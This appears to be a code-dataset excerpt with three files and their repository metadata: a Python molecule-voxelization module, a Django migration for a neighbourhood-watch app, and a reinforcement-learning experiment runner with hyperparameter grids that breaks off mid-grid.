4f3a740b415d7c150ed78898176300696f8bf42e | 15,927 | py | Python | Molecule.py | hassanmohsin/Molecule | 260c7c5d3df68e6c683c6485016d18f5350142e4 | [
"MIT"
] | null | null | null | Molecule.py | hassanmohsin/Molecule | 260c7c5d3df68e6c683c6485016d18f5350142e4 | [
"MIT"
] | null | null | null | Molecule.py | hassanmohsin/Molecule | 260c7c5d3df68e6c683c6485016d18f5350142e4 | [
"MIT"
] | null | null | null |
# coding: utf-8
# van der Waals radii are taken from A. Bondi, J. Phys. Chem., 68, 441 - 452, 1964, <br>
# except the value for H, which is taken from R.S. Rowland & R. Taylor, J.Phys.Chem., 100, 7384 - 7391, 1996. <br>
# Radii that are not available in either of these publications have RvdW = 2.00 <br>
# The radii for Ions (Na, K, Cl, Ca, Mg, and Cs are based on the CHARMM27 Rmin/2 parameters for (SOD, POT, CLA, CAL, MG, CES) by default.
from __future__ import print_function, absolute_import
from collections import OrderedDict
import numpy as np
from scipy import spatial
import pybel
import os
import glob
from tqdm import *
# Molecule class that assigns property of atom to a single voxel
class Molecule1:
mol = None
coords = []
charges = []
elements = []
numAtoms = 0
filename = ""
_dir_name = ""
_element_radii = {
'Ac': 2.0,
'Ag': 1.72,
'Al': 2.0,
'Am': 2.0,
'Ar': 1.88,
'As': 1.85,
'At': 2.0,
'Au': 1.66,
'B': 2.0,
'Ba': 2.0,
'Be': 2.0,
'Bh': 2.0,
'Bi': 2.0,
'Bk': 2.0,
'Br': 1.85,
'C': 1.7,
'Ca': 1.37,
'Cd': 1.58,
'Ce': 2.0,
'Cf': 2.0,
'Cl': 2.27,
'Cm': 2.0,
'Co': 2.0,
'Cr': 2.0,
'Cs': 2.1,
'Cu': 1.4,
'Db': 2.0,
'Ds': 2.0,
'Dy': 2.0,
'Er': 2.0,
'Es': 2.0,
'Eu': 2.0,
'F': 1.47,
'Fe': 2.0,
'Fm': 2.0,
'Fr': 2.0,
'Ga': 1.07,
'Gd': 2.0,
'Ge': 2.0,
'H': 1.2,
'He': 1.4,
'Hf': 2.0,
'Hg': 1.55,
'Ho': 2.0,
'Hs': 2.0,
'I': 1.98,
'In': 1.93,
'Ir': 2.0,
'K': 1.76,
'Kr': 2.02,
'La': 2.0,
'Li': 1.82,
'Lr': 2.0,
'Lu': 2.0,
'Md': 2.0,
'Mg': 1.18,
'Mn': 2.0,
'Mo': 2.0,
'Mt': 2.0,
'N': 1.55,
'Na': 1.36,
'Nb': 2.0,
'Nd': 2.0,
'Ne': 1.54,
'Ni': 1.63,
'No': 2.0,
'Np': 2.0,
'O': 1.52,
'Os': 2.0,
'P': 1.8,
'Pa': 2.0,
'Pb': 2.02,
'Pd': 1.63,
'Pm': 2.0,
'Po': 2.0,
'Pr': 2.0,
'Pt': 1.72,
'Pu': 2.0,
'Ra': 2.0,
'Rb': 2.0,
'Re': 2.0,
'Rf': 2.0,
'Rg': 2.0,
'Rh': 2.0,
'Rn': 2.0,
'Ru': 2.0,
'S': 1.8,
'Sb': 2.0,
'Sc': 2.0,
'Se': 1.9,
'Sg': 2.0,
'Si': 2.1,
'Sm': 2.0,
'Sn': 2.17,
'Sr': 2.0,
'Ta': 2.0,
'Tb': 2.0,
'Tc': 2.0,
'Te': 2.06,
'Th': 2.0,
'Ti': 2.0,
'Tl': 1.96,
'Tm': 2.0,
'U': 1.86,
'V': 2.0,
'W': 2.0,
'X': 1.5,
'Xe': 2.16,
'Y': 2.0,
'Yb': 2.0,
'Zn': 1.39,
'Zr': 2.0
}
_element_mapping = {
'H': 'H',
'HS': 'H',
'HD': 'H',
'A': 'C',
'C': 'C',
'N': 'N',
'NA': 'N',
'NS': 'N',
'O': 'O',
'OA': 'O',
'OS': 'O',
'F': 'F',
'Mg': 'Mg',
'MG': 'Mg',
'P': 'P',
'S': 'S',
'SA': 'S',
'Cl': 'Cl',
'CL': 'Cl',
'Ca': 'Ca',
'CA': 'Ca',
'Fe': 'Fe',
'FE': 'Fe',
'Zn': 'Zn',
'ZN': 'Zn',
'BR': 'Br',
'Br': 'Br',
'I': 'I',
'MN': 'Mn'
}
def __init__(self, file):
self.filename = file
self._read_file()
self.mol = next(pybel.readfile('pdbqt', file))
def _read_file(self):
with open(self.filename, 'r') as f:
content = f.readlines()
# Split lines for space character
content = [s.split() for s in content]
# Choose only those that starts with "ATOM"
content = [line for line in content if line[0]=="ATOM"]
# Get the attributes
self.coords = np.array([line[-7:-4] for line in content], dtype=np.float32)
self.charges = np.array([line[-2] for line in content], dtype=np.float32)
self.elements = np.array([line[-1] for line in content], dtype=object)
self.numAtoms = self.elements.shape[0]
def getVoxelDescriptors(self, side=1):
voxel_side = side # in Angstorm
# Get the channels for each of the properties
elements = np.array([e.upper() for e in self.elements])
properties = OrderedDict()
_prop_order = ['hydrophobic', 'aromatic', 'hbond_acceptor', 'hbond_donor', 'positive_ionizable',
'negative_ionizable', 'metal', 'occupancies']
properties['hydrophobic'] = (self.elements == 'C') | (self.elements == 'A')
properties['aromatic'] = self.elements == 'A'
properties['hbond_acceptor'] = (self.elements == 'NA') | (self.elements == 'NS') | (self.elements == 'OA') | (self.elements == 'OS') | (self.elements == 'SA')
#properties['hbond_acceptor'] = np.array([a.OBAtom.IsHbondAcceptor() for a in self.mol.atoms], dtype=np.bool)
properties['hbond_donor'] = np.array([a.OBAtom.IsHbondDonor() for a in self.mol.atoms], dtype=np.bool)
properties['positive_ionizable'] = self.charges > 0.0
properties['negative_ionizable'] = self.charges < 0.0
properties['metal'] = (self.elements == 'MG') | (self.elements == 'ZN') | (self.elements == 'MN') | (self.elements == 'CA') | (self.elements == 'FE')
properties['occupancies'] = (self.elements != 'H') & (self.elements != 'HS') & (self.elements != 'HD')
channels = np.zeros((len(self.elements), len(properties)), dtype=bool)
for i, p in enumerate(_prop_order):
channels[:, i] = properties[p]
# Now get the Van Dar Wals redii for each of the atoms
vdw_radii = np.array([self._element_radii[self._element_mapping[elm]]
for elm in self.elements], dtype=np.float32)
# Multiply the vdw radii with the channel. False's will be zeros and True's will be the vdw radii
channels = vdw_radii[:, np.newaxis] * channels.astype(np.float32)
# Get the bounding box for the molecule
max_coord = np.max(self.coords, axis=0) # np.squeeze?
min_coord = np.min(self.coords, axis=0) # np.squeeze?
# Calculate the number of voxels required
N = np.ceil((max_coord - min_coord) / voxel_side).astype(int) + 1
# Get the centers of each descriptors
xrange = [min_coord[0] + voxel_side * x for x in range(0, N[0])]
yrange = [min_coord[1] + voxel_side * x for x in range(0, N[1])]
zrange = [min_coord[2] + voxel_side * x for x in range(0, N[2])]
centers = np.zeros((N[0], N[1], N[2], 3))
for i, x in enumerate(xrange):
for j, y in enumerate(yrange):
for k, z in enumerate(zrange):
centers[i, j, k, :] = np.array([x, y, z])
centers = centers.reshape((-1, 3))
features = np.zeros((len(centers), channels.shape[1]), dtype=np.float32)
#features = np.zeros((len(centers)), dtype=np.float32)
for i in range(self.numAtoms):
# Get the atom coordinates
atom_coordinates = self.coords[i]
# Get the closest voxel
c_voxel_id = spatial.distance.cdist(atom_coordinates.reshape((-1, 3)), centers).argmin()
c_voxel = centers[c_voxel_id]
# Calculate the potential
voxel_distance = np.linalg.norm(atom_coordinates - c_voxel)
x = channels[i] / voxel_distance
#x = self._element_radii[self._element_mapping[self.elements[i]]] / voxel_distance
n = 1.0 - np.exp(-np.power(x, 12))
features[c_voxel_id] = n
#break
return features.reshape((N[0], N[1], N[2], -1))
# Molecule class that assigns property of atom to a single voxel and it's 8 neighbors
class Molecule2:
mol = None
coords = []
charges = []
elements = []
numAtoms = 0
filename = ""
_dir_name = ""
_element_radii = {
'Ac': 2.0,
'Ag': 1.72,
'Al': 2.0,
'Am': 2.0,
'Ar': 1.88,
'As': 1.85,
'At': 2.0,
'Au': 1.66,
'B': 2.0,
'Ba': 2.0,
'Be': 2.0,
'Bh': 2.0,
'Bi': 2.0,
'Bk': 2.0,
'Br': 1.85,
'C': 1.7,
'Ca': 1.37,
'Cd': 1.58,
'Ce': 2.0,
'Cf': 2.0,
'Cl': 2.27,
'Cm': 2.0,
'Co': 2.0,
'Cr': 2.0,
'Cs': 2.1,
'Cu': 1.4,
'Db': 2.0,
'Ds': 2.0,
'Dy': 2.0,
'Er': 2.0,
'Es': 2.0,
'Eu': 2.0,
'F': 1.47,
'Fe': 2.0,
'Fm': 2.0,
'Fr': 2.0,
'Ga': 1.07,
'Gd': 2.0,
'Ge': 2.0,
'H': 1.2,
'He': 1.4,
'Hf': 2.0,
'Hg': 1.55,
'Ho': 2.0,
'Hs': 2.0,
'I': 1.98,
'In': 1.93,
'Ir': 2.0,
'K': 1.76,
'Kr': 2.02,
'La': 2.0,
'Li': 1.82,
'Lr': 2.0,
'Lu': 2.0,
'Md': 2.0,
'Mg': 1.18,
'Mn': 2.0,
'Mo': 2.0,
'Mt': 2.0,
'N': 1.55,
'Na': 1.36,
'Nb': 2.0,
'Nd': 2.0,
'Ne': 1.54,
'Ni': 1.63,
'No': 2.0,
'Np': 2.0,
'O': 1.52,
'Os': 2.0,
'P': 1.8,
'Pa': 2.0,
'Pb': 2.02,
'Pd': 1.63,
'Pm': 2.0,
'Po': 2.0,
'Pr': 2.0,
'Pt': 1.72,
'Pu': 2.0,
'Ra': 2.0,
'Rb': 2.0,
'Re': 2.0,
'Rf': 2.0,
'Rg': 2.0,
'Rh': 2.0,
'Rn': 2.0,
'Ru': 2.0,
'S': 1.8,
'Sb': 2.0,
'Sc': 2.0,
'Se': 1.9,
'Sg': 2.0,
'Si': 2.1,
'Sm': 2.0,
'Sn': 2.17,
'Sr': 2.0,
'Ta': 2.0,
'Tb': 2.0,
'Tc': 2.0,
'Te': 2.06,
'Th': 2.0,
'Ti': 2.0,
'Tl': 1.96,
'Tm': 2.0,
'U': 1.86,
'V': 2.0,
'W': 2.0,
'X': 1.5,
'Xe': 2.16,
'Y': 2.0,
'Yb': 2.0,
'Zn': 1.39,
'Zr': 2.0
}
_element_mapping = {
'H': 'H',
'HS': 'H',
'HD': 'H',
'A': 'C',
'C': 'C',
'N': 'N',
'NA': 'N',
'NS': 'N',
'O': 'O',
'OA': 'O',
'OS': 'O',
'F': 'F',
'Mg': 'Mg',
'MG': 'Mg',
'P': 'P',
'S': 'S',
'SA': 'S',
'Cl': 'Cl',
'CL': 'Cl',
'Ca': 'Ca',
'CA': 'Ca',
'Fe': 'Fe',
'FE': 'Fe',
'Zn': 'Zn',
'ZN': 'Zn',
'BR': 'Br',
'Br': 'Br',
'I': 'I',
'MN': 'Mn'
}
def __init__(self, file):
self.filename = file
self._read_file()
self.mol = next(pybel.readfile('pdbqt', file))
def _read_file(self):
with open(self.filename, 'r') as f:
content = f.readlines()
# Split lines for space character
content = [s.split() for s in content]
# Choose only those that starts with "ATOM"
content = [line for line in content if line[0]=="ATOM"]
# Get the attributes
self.coords = np.array([line[-7:-4] for line in content], dtype=np.float32)
self.charges = np.array([line[-2] for line in content], dtype=np.float32)
self.elements = np.array([line[-1] for line in content], dtype=object)
self.numAtoms = self.elements.shape[0]
def getVoxelDescriptors(self, side=1):
voxel_side = side # in Angstorm
# Get the channels for each of the properties
elements = np.array([e.upper() for e in self.elements])
properties = OrderedDict()
_prop_order = ['hydrophobic', 'aromatic', 'hbond_acceptor', 'hbond_donor', 'positive_ionizable',
'negative_ionizable', 'metal', 'occupancies']
properties['hydrophobic'] = (self.elements == 'C') | (self.elements == 'A')
properties['aromatic'] = self.elements == 'A'
properties['hbond_acceptor'] = (self.elements == 'NA') | (self.elements == 'NS') | (self.elements == 'OA') | (self.elements == 'OS') | (self.elements == 'SA')
#properties['hbond_acceptor'] = np.array([a.OBAtom.IsHbondAcceptor() for a in self.mol.atoms], dtype=np.bool)
properties['hbond_donor'] = np.array([a.OBAtom.IsHbondDonor() for a in self.mol.atoms], dtype=np.bool)
properties['positive_ionizable'] = self.charges > 0.0
properties['negative_ionizable'] = self.charges < 0.0
properties['metal'] = (self.elements == 'MG') | (self.elements == 'ZN') | (self.elements == 'MN') | (self.elements == 'CA') | (self.elements == 'FE')
properties['occupancies'] = (self.elements != 'H') & (self.elements != 'HS') & (self.elements != 'HD')
channels = np.zeros((len(self.elements), len(properties)), dtype=bool)
for i, p in enumerate(_prop_order):
channels[:, i] = properties[p]
# Now get the Van Dar Wals redii for each of the atoms
vdw_radii = np.array([self._element_radii[self._element_mapping[elm]]
for elm in self.elements], dtype=np.float32)
# Multiply the vdw radii with the channel. False's will be zeros and True's will be the vdw radii
channels = vdw_radii[:, np.newaxis] * channels.astype(np.float32)
# Get the bounding box for the molecule
max_coord = np.max(self.coords, axis=0) # np.squeeze?
min_coord = np.min(self.coords, axis=0) # np.squeeze?
# Calculate the number of voxels required
N = np.ceil((max_coord - min_coord) / voxel_side).astype(int) + 1
# Get the centers of each descriptors
xrange = [min_coord[0] + voxel_side * x for x in range(0, N[0])]
yrange = [min_coord[1] + voxel_side * x for x in range(0, N[1])]
zrange = [min_coord[2] + voxel_side * x for x in range(0, N[2])]
centers = np.zeros((N[0], N[1], N[2], 3))
for i, x in enumerate(xrange):
for j, y in enumerate(yrange):
for k, z in enumerate(zrange):
centers[i, j, k, :] = np.array([x, y, z])
centers = centers.reshape((-1, 3))
features = np.zeros((len(centers), channels.shape[1]), dtype=np.float32)
#features = np.zeros((len(centers)), dtype=np.float32)
for i in range(self.numAtoms):
# Get the atom coordinates
atom_coordinates = self.coords[i]
# Get the closest voxel and it's 8 neighbors ids and distances
voxel_distances = spatial.distance.cdist(atom_coordinates.reshape((-1, 3)), centers).reshape(-1)
c_voxel_ids = voxel_distances.argsort()[:9]
c_voxel_dist = np.sort(voxel_distances)[:9]
# Calculate the potential
#voxel_distance = np.linalg.norm(atom_coordinates - c_voxel)
x = channels[i] / c_voxel_dist.reshape(-1)[:, np.newaxis]
#x = self._element_radii[self._element_mapping[self.elements[i]]] / voxel_distance
n = 1.0 - np.exp(-np.power(x, 12))
# Get the maximum and assign
max_feat = np.maximum(features[c_voxel_ids], n)
features[c_voxel_ids] = n
return features.reshape((N[0], N[1], N[2], -1)) | 30.806576 | 166 | 0.455955 | 2,167 | 15,927 | 3.287494 | 0.164282 | 0.039865 | 0.019652 | 0.017967 | 0.899214 | 0.894161 | 0.889669 | 0.889669 | 0.889669 | 0.875351 | 0 | 0.064962 | 0.364036 | 15,927 | 517 | 167 | 30.806576 | 0.638365 | 0.13857 | 0 | 0.941176 | 0 | 0 | 0.077525 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.014118 | false | 0 | 0.018824 | 0 | 0.084706 | 0.002353 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
4f8e04fc759c0932e7f37a76137a65ef74d5e1e7 | 2,119 | py | Python | security/migrations/0002_auto_20210727_1158.py | TechVictorKE/neighborhood-watch | b7bd73ccfbc350b9799e15cce3306d929a8307e2 | [
"MIT"
] | null | null | null | security/migrations/0002_auto_20210727_1158.py | TechVictorKE/neighborhood-watch | b7bd73ccfbc350b9799e15cce3306d929a8307e2 | [
"MIT"
] | null | null | null | security/migrations/0002_auto_20210727_1158.py | TechVictorKE/neighborhood-watch | b7bd73ccfbc350b9799e15cce3306d929a8307e2 | [
"MIT"
] | null | null | null | # Generated by Django 2.2.1 on 2021-07-27 08:58
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('security', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='authorities',
name='id',
field=models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='blogpost',
name='id',
field=models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='business',
name='id',
field=models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='comment',
name='id',
field=models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='health',
name='id',
field=models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='healthservices',
name='id',
field=models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='neighbourhood',
name='id',
field=models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='notifications',
name='id',
field=models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='profile',
name='id',
field=models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
]
| 35.915254 | 108 | 0.59698 | 216 | 2,119 | 5.685185 | 0.212963 | 0.087948 | 0.183225 | 0.212541 | 0.789902 | 0.789902 | 0.789902 | 0.789902 | 0.789902 | 0.789902 | 0 | 0.012459 | 0.280321 | 2,119 | 58 | 109 | 36.534483 | 0.792787 | 0.021236 | 0 | 0.692308 | 1 | 0 | 0.069015 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.019231 | 0 | 0.076923 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
96cbd5c6f3e31a4e61e41418991ba6a28beee2d4 | 30,731 | py | Python | runner.py | willwhitney/exploration-reimplementation | 5e2ca54119529b8bf9235bfbad92e38a6781fbd5 | [
"Apache-2.0"
] | 2 | 2020-08-24T15:59:59.000Z | 2020-08-24T17:03:30.000Z | runner.py | willwhitney/exploration-reimplementation | 5e2ca54119529b8bf9235bfbad92e38a6781fbd5 | [
"Apache-2.0"
] | null | null | null | runner.py | willwhitney/exploration-reimplementation | 5e2ca54119529b8bf9235bfbad92e38a6781fbd5 | [
"Apache-2.0"
] | null | null | null | import itertools
import os
import subprocess
import sys
import asyncio
import copy
import glob
import shutil
from pathlib import Path
from runner_utils import main, slurm_main, construct_varying_keys, construct_jobs
local = '--local' in sys.argv
greene = '--greene' in sys.argv
dry_run = '--dry-run' in sys.argv
GPUS = [0, 1, 2, 3]
MULTIPLEX = 2
# basename = "pv100_sacqex_v2"
# grid = [
# {
# # define the task
# "_main": ["main_sac_qex.py"],
# "eval_every": [1],
# "env": ["point"],
# "task": ["velocity"],
# "max_episodes": [500],
# "max_steps": [100],
# "seed": list(range(8)),
# # density settings
# "density": ["keops_kernel_count"],
# "density_state_scale": [0.02],
# "density_action_scale": [1],
# "density_max_obs": [2**15],
# "density_tolerance": [0.95],
# "density_conserve_weight": [True],
# # task policy settings
# "policy": ["sac_qex"],
# "policy_updates_per_step": [1],
# },
# ]
# basename = "pv100_bbe_v4_updates"
# grid = [
# {
# # define the task
# "_main": ["main.py"],
# "eval_every": [1],
# "env": ["point"],
# "task": ["velocity"],
# "max_episodes": [500],
# "seed": list(range(8)),
# "no_exploration": [False],
# # density settings
# "density": ["keops_kernel_count"],
# "density_state_scale": [0.02],
# "density_action_scale": [1],
# "density_max_obs": [2**15],
# "density_tolerance": [0.95],
# "density_conserve_weight": [True],
# # task policy settings
# "policy": ["sac"],
# "policy_updates_per_step": [4],
# # novelty Q settings
# "uniform_update_candidates": [True],
# "n_updates_per_step": [4],
# "update_target_every": [4],
# },
# {
# # define the task
# "_main": ["main_bbe.py"],
# "eval_every": [1],
# "env": ["point"],
# "task": ["velocity"],
# "max_episodes": [500],
# "seed": list(range(8)),
# "no_exploration": [False],
# # density settings
# "density": ["keops_kernel_count"],
# "density_state_scale": [0.02],
# "density_action_scale": [1],
# "density_max_obs": [2**15],
# "density_tolerance": [0.95],
# "density_conserve_weight": [True],
# # task policy settings
# "policy": ["sac"],
# "policy_updates_per_step": [4],
# },
# ]
# basename = "wex_walk_narrow_sparse_v3_seeds"
# grid = [
# {
# # define the task
# "_main": ["main.py"],
# "eval_every": [1],
# "env": ["walker_explore"],
# "task": ["walk_narrow_sparse"],
# "seed": list(range(4)),
# "no_exploration": [True, False],
# # density settings
# "density": ["keops_kernel_count"],
# "density_state_scale": [5e-1],
# "density_action_scale": [1],
# "density_max_obs": [2**15],
# "density_tolerance": [0.5],
# "density_conserve_weight": [True],
# # task policy settings
# "policy": ["sac"],
# "policy_updates_per_step": [1],
# # novelty Q settings
# "uniform_update_candidates": [True],
# "n_updates_per_step": [2],
# "update_target_every": [2],
# },
# ]
# basename = "walker_walk_v1_seeds"
# grid = [
# {
# # define the task
# "_main": ["main.py"],
# "eval_every": [1],
# "env": ["walker"],
# "task": ["walk"],
# "seed": list(range(4)),
# "no_exploration": [True, False],
# # density settings
# "density": ["keops_kernel_count"],
# "density_state_scale": [5e-1],
# "density_action_scale": [1],
# "density_max_obs": [2**15],
# "density_tolerance": [0.5],
# "density_conserve_weight": [True],
# # task policy settings
# "policy": ["sac"],
# "policy_updates_per_step": [1],
# # novelty Q settings
# "uniform_update_candidates": [True],
# "n_updates_per_step": [2],
# "update_target_every": [2],
# },
# ]
# basename = "finger_all_v6_scale_low"
# grid = [
# {
# # define the task
# "_main": ["main.py"],
# "eval_every": [1],
# "env": ["finger_explore"],
# "task": ["turn_hard_narrow"],
# "seed": list(range(8)),
# "no_exploration": [True, False],
# # density settings
# "density": ["keops_kernel_count"],
# "density_state_scale": [0.1],
# "density_action_scale": [1],
# "density_max_obs": [2**15],
# "density_tolerance": [0.5],
# "density_conserve_weight": [True],
# # task policy settings
# "policy": ["sac"],
# "policy_updates_per_step": [1],
# # novelty Q settings
# "uniform_update_candidates": [True],
# "n_updates_per_step": [2],
# "update_target_every": [2],
# },
# {
# # define the task
# "_main": ["main.py"],
# "eval_every": [1],
# "env": ["finger"],
# "task": ["turn_hard"],
# "seed": list(range(8)),
# "no_exploration": [True, False],
# # density settings
# "density": ["keops_kernel_count"],
# "density_state_scale": [0.1],
# "density_action_scale": [1],
# "density_max_obs": [2**15],
# "density_tolerance": [0.5],
# "density_conserve_weight": [True],
# # task policy settings
# "policy": ["sac"],
# "policy_updates_per_step": [1],
# # novelty Q settings
# "uniform_update_candidates": [True],
# "n_updates_per_step": [2],
# "update_target_every": [2],
# },
# ]
# finger_all_v1arrow_seed0_no_explorationTrue--rrow_seed0_no_explorationFalse.slurm
# basename = "finger_all_v2_rerun"
# grid = [
# {
# # define the task
# "_main": ["main.py"],
# "eval_every": [5],
# "env": ["finger_explore"],
# "task": ["turn_hard_narrow"],
# "seed": [0],
# "no_exploration": [True, False],
# # density settings
# "density": ["keops_kernel_count"],
# "density_state_scale": [0.34],
# "density_action_scale": [1],
# "density_max_obs": [2**15],
# "density_tolerance": [0.9],
# "density_conserve_weight": [True],
# # task policy settings
# "policy": ["sac"],
# "policy_updates_per_step": [1],
# # novelty Q settings
# "uniform_update_candidates": [True],
# "n_updates_per_step": [2],
# "update_target_every": [2],
# },
# ]
# basename = "fex_hard_v3_seeds"
# grid = [
# {
# # define the task
# "_main": ["main.py"],
# "eval_every": [5],
# "env": ["finger_explore"],
# "task": ["turn_hard_narrow"],
# "seed": list(range(4)),
# "no_exploration": [True, False],
# # density settings
# "density": ["keops_kernel_count"],
# "density_state_scale": [1e-1],
# "density_action_scale": [1],
# "density_max_obs": [2**15],
# "density_tolerance": [0.5],
# "density_conserve_weight": [True],
# # task policy settings
# "policy": ["sac"],
# "policy_updates_per_step": [1],
# # novelty Q settings
# "uniform_update_candidates": [True],
# "n_updates_per_step": [2],
# "update_target_every": [2],
# },
# ]
# basename = "finger_v2"
# grid = [
# {
# # define the task
# "_main": ["main.py"],
# "eval_every": [5],
# "env": ["finger"],
# "task": ["turn_hard"],
# "seed": list(range(4)),
# "no_exploration": [True, False],
# # density settings
# "density": ["keops_kernel_count"],
# "density_state_scale": [1e-1],
# "density_action_scale": [1],
# "density_max_obs": [2**15],
# "density_tolerance": [0.5],
# "density_conserve_weight": [True],
# # task policy settings
# "policy": ["sac"],
# "policy_updates_per_step": [1],
# # novelty Q settings
# "uniform_update_candidates": [True],
# "n_updates_per_step": [2],
# "update_target_every": [2],
# },
# ]
# basename = "bice_v6_seeds"
# grid = [
# {
# # define the task
# "_main": ["main.py"],
# "eval_every": [1],
# "env": ["ball_in_cup", "ball_in_cup_explore"],
# "task": ["catch"],
# "no_exploration": [True, False],
# "seed": list(range(4)),
# # density settings
# "density": ["keops_kernel_count"],
# "density_state_scale": [0.24],
# "density_action_scale": [1],
# "density_max_obs": [2**15],
# "density_tolerance": [0.9],
# "density_conserve_weight": [True],
# # task policy settings
# "policy": ["sac"],
# # novelty Q settings
# "uniform_update_candidates": [True],
# "n_updates_per_step": [2],
# "update_target_every": [2],
# },
# ]
# basename = "reacher_v10_correct"
# grid = [
# {
# # define the task
# "_main": ["main.py"],
# "eval_every": [1],
# "env": ["reacher_explore"],
# "task": ["hard_narrow_init"],
# "max_episodes": [500],
# "no_exploration": [True, False],
# "seed": list(range(8)),
# # density settings
# "density": ["keops_kernel_count"],
# "density_state_scale": [0.06],
# "density_action_scale": [1],
# "density_max_obs": [2**15],
# "density_tolerance": [0.9],
# "density_conserve_weight": [True],
# # task policy settings
# "policy": ["sac"],
# # novelty Q settings
# "uniform_update_candidates": [True],
# "n_updates_per_step": [2],
# "update_target_every": [2],
# },
# {
# # define the task
# "_main": ["main.py"],
# "eval_every": [1],
# "env": ["reacher"],
# "task": ["hard"],
# "max_episodes": [500],
# "no_exploration": [True, False],
# "seed": list(range(8)),
# # density settings
# "density": ["keops_kernel_count"],
# "density_state_scale": [0.06],
# "density_action_scale": [1],
# "density_max_obs": [2**15],
# "density_tolerance": [0.9],
# "density_conserve_weight": [True],
# # task policy settings
# "policy": ["sac"],
# # novelty Q settings
# "uniform_update_candidates": [True],
# "n_updates_per_step": [2],
# "update_target_every": [2],
# },
# ]
# reacher_explore_v8_seedshard_no_explorationFalse_seed4--hard_no_explorationFalse_seed5
# basename = "reacher_explore_v9_rerun"
# grid = [
# {
# # define the task
# "_main": ["main.py"],
# "eval_every": [1],
# "env": ["reacher_explore"],
# "task": ["hard"],
# "max_episodes": [500],
# "no_exploration": [False],
# "seed": [4, 5],
# # density settings
# "density": ["keops_kernel_count"],
# "density_state_scale": [0.18],
# "density_action_scale": [1],
# "density_max_obs": [2**15],
# "density_tolerance": [0.9],
# "density_conserve_weight": [True],
# # task policy settings
# "policy": ["sac"],
# # novelty Q settings
# "uniform_update_candidates": [True],
# "n_updates_per_step": [2],
# "update_target_every": [2],
# },
# ]
# basename = "hallway_all_v4"
# grid = [
# {
# # define the task
# "_main": ["main.py"],
# "eval_every": [1],
# "env": ["hallway"],
# "task": ["velocity_1", "velocity_4_inverse_distractor"],
# "max_episodes": [100],
# "no_exploration": [True, False],
# "seed": list(range(4)),
# # density settings
# "density": ["keops_kernel_count"],
# "density_state_scale": [0.068],
# "density_action_scale": [1],
# "density_max_obs": [2**15],
# "density_tolerance": [0.9],
# "density_conserve_weight": [True],
# # task policy settings
# "policy": ["sac"],
# # novelty Q settings
# "uniform_update_candidates": [True],
# "n_updates_per_step": [2],
# "update_target_every": [2],
# },
# {
# # define the task
# "_main": ["main.py"],
# "eval_every": [1],
# "env": ["hallway"],
# "task": ["velocity_4", "velocity_4_distractor"],
# "max_episodes": [300],
# "no_exploration": [True, False],
# "seed": list(range(4)),
# # density settings
# "density": ["keops_kernel_count"],
# "density_state_scale": [0.068],
# "density_action_scale": [1],
# "density_max_obs": [2**15],
# "density_tolerance": [0.9],
# "density_conserve_weight": [True],
# # task policy settings
# "policy": ["sac"],
# # novelty Q settings
# "uniform_update_candidates": [True],
# "n_updates_per_step": [2],
# "update_target_every": [2],
# },
# ]
# basename = "hallway_vis_v2"
# grid = [
# {
# # define the task
# "_main": ["main.py"],
# "eval_every": [1],
# "env": ["hallway"],
# "task": ["velocity_4"],
# "video_every": [1],
# "no_exploration": [False, True],
# # "seed": [0, 1],
# # density settings
# "density": ["keops_kernel_count"],
# "density_state_scale": [0.01],
# "density_action_scale": [1],
# "density_max_obs": [2**15],
# "density_tolerance": [0.5],
# # task policy settings
# "policy": ["sac"],
# "policy_updates_per_step": [4],
# # novelty Q settings
# "uniform_update_candidates": [True],
# "n_updates_per_step": [2],
# "update_target_every": [2],
# },
# ]
# basename = "pv100_v10_greene"
# grid = [
# {
# # define the task
# "_main": ["main.py"],
# "eval_every": [1],
# "env": ["point"],
# "task": ["velocity"],
# "seed": list(range(2)),
# "no_exploration": [True, False],
# # density settings
# "density": ["keops_kernel_count"],
# "density_state_scale": [6e-2],
# "density_action_scale": [1],
# "density_max_obs": [2**15],
# "density_tolerance": [0.95],
# "density_conserve_weight": [True],
# # task policy settings
# "policy": ["sac"],
# "policy_updates_per_step": [4],
# # novelty Q settings
# "uniform_update_candidates": [True],
# "n_updates_per_step": [2],
# "update_target_every": [2],
# },
# ]
basename = "bbe_all_v3_moreseeds"
grid = [
# reacher
{
# define the task
"_main": ["main_bbe.py"],
"eval_every": [1],
"env": ["reacher_explore"],
"task": ["hard_narrow_init"],
"max_episodes": [500],
"seed": list(range(4, 8)),
# density settings
"density": ["keops_kernel_count"],
"density_state_scale": [0.06],
"density_action_scale": [1],
"density_max_obs": [2**15],
"density_tolerance": [0.9],
"density_conserve_weight": [True],
# task policy settings
"policy": ["sac"],
},
{
# define the task
"_main": ["main_bbe.py"],
"eval_every": [1],
"env": ["reacher"],
"task": ["hard"],
"max_episodes": [500],
"seed": list(range(4, 8)),
# density settings
